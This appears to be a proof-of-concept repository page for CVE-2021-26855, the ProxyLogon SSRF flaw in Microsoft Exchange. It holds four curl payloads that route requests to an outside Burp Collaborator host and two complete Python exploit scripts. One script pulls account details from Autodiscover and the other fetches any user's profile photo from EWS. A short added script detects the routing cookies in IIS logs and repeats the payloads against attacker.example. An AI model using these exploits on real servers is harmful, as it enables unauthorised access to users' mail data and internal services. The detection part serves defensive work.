
PoC details: d1c5be46edbb3b3d600580aec8d66c016de2d3cb

Source
Related vulnerability
Title: Microsoft Exchange Server code issue vulnerability (CVE-2021-26855)
Description: Microsoft Exchange Server is an e-mail server suite from the US company Microsoft. It provides mail access, storage and forwarding, voice mail, mail filtering and related functions. Microsoft Exchange Server security vulnerability. An attacker can craft malicious HTTP requests and authenticate through the Exchange Server, then scan the internal network and obtain sensitive user information. The following products and versions are affected: Microsoft Exchange Server 2013 Cumulative Update 23, Microsoft Exchange
Introduction
# CVE-2021-26855_PoC
My early SSRF payloads (CVE-2021-26855) over Exchange Server 2019...

Payload (1) 
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/ecp/default.flt?~3; X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/owa/auth/logon.aspx?~3' $'https://<exchange_server>/owa/auth/Current/themes/resources/logon.css'
```
Payload (2) 
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net/api/endpoint#~1' $'https://<exchange_server>/ecp/favicon.ico'
```
Payload (3)
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -H $'Content-Length: 0' -b $'X-BEResource=8r0apyvx5dt613lnaabo1qotwk2bq0.burpcollaborator.net#~1' $'https://<exchange_server>/ecp/favicon.ico'
```
Payload (4)
```
# curl -i -s -k -X $'GET' -H $'Host: <exchange_server>' -H $'User-Agent: alex666' -H $'Connection: close' -b $'X-AnonResource=true; X-AnonResource-Backend=sgca4i4yj8wrpuipvxeupawsqjw9ky.burpcollaborator.net/#~1' $'https://<exchange_server>/owa/auth/favicon.ico' 
```
[../snip]

![Screen Recording](https://github.com/alt3kx/CVE-2021-26855_PoC/blob/main/CVE-2021-26855.gif)


# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855) (1)
Updated: Autodiscover

```python
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)
# By Alex Hernandez aka alt3kx (c) Mar 2021
#
# Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
# Usage: python ssrf_auto.py <target> <email>
# Example: python ssrf_auto.py mail.exchange.com administrator@exchange.com
#
#
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
import os

#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

if len(sys.argv) < 3:  # both <target> and <email> are required
  os.system('clear')
  print("PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)")
  print("By Alex Hernandez aka alt3kx (c) Mar 2021")
  print("Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/\n")
  print("Usage: python ssrf_auto.py <target> <email>")
  print("Example: python ssrf_auto.py mail.exchange.com administrator@exchange.com")
  exit()

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]

random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
autoDiscoverBody = """<Autodiscover xmlns="http://schemas.microsoft.com/exchange/autodiscover/outlook/requestschema/2006">
    <Request>
      <EMailAddress>%s</EMailAddress> <AcceptableResponseSchema>http://schemas.microsoft.com/exchange/autodiscover/outlook/responseschema/2006a</AcceptableResponseSchema>
    </Request>
</Autodiscover>
""" % email

print("[+] \033[1mAttacking Exchange Server:\033[00m " + target)

FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
                                                                        "User-Agent": user_agent},
                  verify=False, #proxies=proxies
                  )
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
    FQDN = ct.headers["X-FEServer"]

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=%s/autodiscover/autodiscover.xml?a=~1942062522;" % FQDN,
    "Content-Type": "text/xml",
    "User-Agent": user_agent},
                   data=autoDiscoverBody,
                   verify=False, 
                   #proxies=proxies
                   )
if ct.status_code != 200:
    print("[-] Autodiscover Error!")
    exit()
if "<LegacyDN>" not in ct.content:
    print("[-] Can not get LegacyDN! from " + email)
    exit()

legacyDn = ct.content.split("<LegacyDN>")[1].split("</LegacyDN>")[0]
DisplayName = ct.content.split("<DisplayName>")[1].split("</DisplayName>")[0]
Address = ct.content.split("<AutoDiscoverSMTPAddress>")[1].split("</AutoDiscoverSMTPAddress>")[0]
AccountType = ct.content.split("<AccountType>")[1].split("</AccountType>")[0]
MicrosoftOnline = ct.content.split("<MicrosoftOnline>")[1].split("</MicrosoftOnline>")[0]
PublicFolderServer = ct.content.split("<PublicFolderServer>")[1].split("</PublicFolderServer>")[0]
Server = ct.content.split("<Server>")[1].split("</Server>")[0]
AD = ct.content.split("<AD>")[1].split("</AD>")[0]
ServerExclusiveConnect = ct.content.split("<ServerExclusiveConnect>")[1].split("</ServerExclusiveConnect>")[0]
AuthPackage = ct.content.split("<AuthPackage>")[1].split("</AuthPackage>")[0]
CertPrincipalName = ct.content.split("<CertPrincipalName>")[1].split("</CertPrincipalName>")[0]
OWAUrl = ct.content.split("<OWAUrl AuthenticationMethod=")[1].split("</OWAUrl>")[0]
OOFUrl = ct.content.split("<OOFUrl>")[1].split("</OOFUrl>")[0]

print("[+] \033[32mSuccess!\033[00m: SSRF Authenticated on Backend Service")
print("[+] Got details...")
print("[+] Name: " + DisplayName)
print("[+] DN: " + legacyDn)
print("[+] SMTP Address: " + Address)
print("[+] Account Type: " + AccountType)
print("[+] Microsoft Online status: " + MicrosoftOnline) 
print("[+] Public folder Server: " + PublicFolderServer)
print("[+] Server: " + Server)
print("[+] AD: " + AD)
print("[+] Server Exclusive Connect status: " + ServerExclusiveConnect)
print("[+] Authentication Package used: " + AuthPackage)
print("[+] Cert Principal Name status: " + CertPrincipalName)
print("[+] OWA URL: " + OWAUrl)
print("[+] OOF Url: " + OOFUrl + "\t<- Use this URL to extract emails, contacts from BackEnd Service")
```
![image](https://github.com/alt3kx/CVE-2021-26855_PoC/blob/main/ssrf_auto.png)

# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855) (2)
Updated: Get the photo profile from any user/email :D  

```python
# PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)
# By Alex Hernandez aka alt3kx (c) Mar 2021
#
# Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/
# Usage: python ssrf_getphoto.py <target> <email>
# Example: python ssrf_getphoto.py mail.exchange.com administrator@exchange.com
#
#
import requests
from urllib3.exceptions import InsecureRequestWarning
import random
import string
import sys
import os

#proxies = {'http':'http://127.0.0.1:8080','https':'http://127.0.0.1:8080'}

def id_generator(size=6, chars=string.ascii_lowercase + string.digits):
    return ''.join(random.choice(chars) for _ in range(size))

if len(sys.argv) < 3:  # both <target> and <email> are required
  os.system('clear')
  print("PoC Exploit Exchange Server SSRF Authenticated Backend Service (CVE-2021-26855)")
  print("By Alex Hernandez aka alt3kx (c) Mar 2021")
  print("Reference: https://www.praetorian.com/blog/reproducing-proxylogon-exploit/\n")
  print("Usage: python ssrf_getphoto.py <target> <email>")
  print("Example: python ssrf_getphoto.py mail.exchange.com administrator@exchange.com")
  exit()

requests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)
target = sys.argv[1]
email = sys.argv[2]

random_name = id_generator(3) + ".js"
user_agent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
SoapBody = """<?xml version="1.0" encoding="utf-8" ?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
               xmlns:xsd="http://www.w3.org/2001/XMLSchema"
               xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
               xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
               xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
  <soap:Header>
    <t:RequestServerVersion Version="Exchange2013"/>
  </soap:Header>
  <soap:Body>
    <m:GetUserPhoto>
      <m:Email>%s</m:Email>
      <m:SizeRequested>HR48x48</m:SizeRequested>
    </m:GetUserPhoto>
  </soap:Body>
</soap:Envelope>
""" % email

print("[+] \033[1mAttacking Exchange Server:\033[00m " + target)

FQDN = "EXCHANGE"
ct = requests.get("https://%s/ecp/%s" % (target, random_name), headers={"Cookie": "X-BEResource=localhost~1942062522",
                                                                        "User-Agent": user_agent},
                  verify=False, #proxies=proxies
                  )
if "X-CalculatedBETarget" in ct.headers and "X-FEServer" in ct.headers:
    FQDN = ct.headers["X-FEServer"]

ct = requests.post("https://%s/ecp/%s" % (target, random_name), headers={
    "Cookie": "X-BEResource=%s/EWS/Exchange.asmx?a=~3;" % FQDN,
    "Content-Type": "text/xml",
    "User-Agent": user_agent},
                   data=SoapBody,
                   verify=False, 
                   #proxies=proxies
                   )
#if ct.status_code != 200:
#    print("[-] SoapBody Error!")
#    exit()
if "</PictureData>" not in ct.content:
    print("[-] Can not get photo profile from " + email )
    exit()

ResponseCode = ct.content.split("<ResponseCode>")[1].split("</ResponseCode>")[0]
ContentType = ct.content.split("<ContentType>")[1].split("</ContentType>")[0]
PictureData = ct.content.split("<PictureData>")[1].split("</PictureData>")[0]

print("[+] \033[32mSuccess\033[00m: SSRF Authenticated on Backend Service")
print("[+] Got the picture!...")
print("[+] Response Code status: " + ResponseCode)
print("[+] Content type : " + ContentType)
print("[+] Photo profile from : " + email)
print("[+] Picture on Base64 format from : " + PictureData)
```

![image](https://github.com/alt3kx/CVE-2021-26855_PoC/blob/main/ssrf_getphoto.png)
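Detection-side counterpart to the curl payloads above and to the `X-BEResource` routing cookie both scripts send: an added example, not code from the original repository, that scans IIS request logs for client-supplied backend-routing cookies carrying the `~<version>` suffix. It assumes W3C logging with the `cs(Cookie)` field enabled and a reduced, constructed field order; the sample lines, the `EXCH01` host and the `attacker.example` domain are all constructed.

```python
import re

# Constructed sample in a reduced W3C/IIS layout (assumed field order:
# date time cs-uri-stem cs-username cs(Cookie)); not data from the page.
# IIS writes '+' for spaces inside the cookie field.
SAMPLE_LOG = """\
2021-03-03 10:00:01 /owa/auth/logon.aspx - -
2021-03-03 10:00:05 /ecp/favicon.ico - X-BEResource=attacker.example#~1
2021-03-03 10:00:09 /owa/auth/Current/themes/resources/logon.css - X-AnonResource=true;+X-AnonResource-Backend=attacker.example/ecp/default.flt?~3;+X-BEResource=attacker.example/owa/auth/logon.aspx?~3
2021-03-03 10:00:12 /ecp/ab3.js - X-BEResource=localhost~1942062522
2021-03-03 10:00:13 /ecp/ab3.js - X-BEResource=EXCH01/autodiscover/autodiscover.xml?a=~1942062522;
2021-03-03 10:00:20 /ecp/ DOMAIN\\jsmith ASP.NET_SessionId=abc123
"""

# Cookies the front end treats as backend-routing hints; browsers never send
# them, so any client-supplied value with the '~<version>' suffix is suspect.
ROUTING_COOKIES = ("X-BEResource", "X-AnonResource-Backend")
VERSION_SUFFIX = re.compile(r"~\d+\s*$")

def parse_cookies(raw):
    """Turn an IIS cs(Cookie) field into a dict ('-' means no cookie)."""
    jar = {}
    for part in raw.replace("+", " ").split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            jar[name] = value
    return jar

def backend_target(value):
    """Host the cookie would route to: everything before path, fragment, query or version."""
    return re.split(r"[/#?~]", value, maxsplit=1)[0]

def scan_log(text):
    """Return one finding per log line whose routing cookies carry a version suffix."""
    findings = []
    for line in text.splitlines():
        if not line or line.startswith("#"):  # skip blanks and '#Fields:' headers
            continue
        _date, time, uri, user, cookie_field = line.split(" ", 4)
        jar = parse_cookies(cookie_field)
        hits = {n: v for n, v in jar.items() if n in ROUTING_COOKIES and VERSION_SUFFIX.search(v)}
        if hits:
            findings.append({"time": time, "uri": uri, "user": user,
                             "cookies": sorted(hits),
                             "targets": sorted({backend_target(v) for v in hits.values()})})
    return findings

if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print("%(time)s %(uri)s user=%(user)s cookies=%(cookies)s -> %(targets)s" % f)
```

A hit whose target is the server's own FQDN or `localhost` (the probe both scripts start with) is as significant as one pointing at an external host, since the cookie should never arrive from a client at all.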



# Reference: 
https://www.praetorian.com/blog/reproducing-proxylogon-exploit/

# Author
Alex Hernandez aka <em><a href="https://twitter.com/_alt3kx_" rel="nofollow">(@\_alt3kx\_)</a></em>
File snapshot

```
[4.0K] /data/pocs/d1c5be46edbb3b3d600580aec8d66c016de2d3cb
├── [1.4M] CVE-2021-26855.gif
├── [10.0K] README.md
├── [178K] ssrf_auto.png
├── [4.4K] ssrf_auto.py
├── [292K] ssrf_getphoto.png
└── [3.5K] ssrf_getphoto.py

0 directories, 6 files
```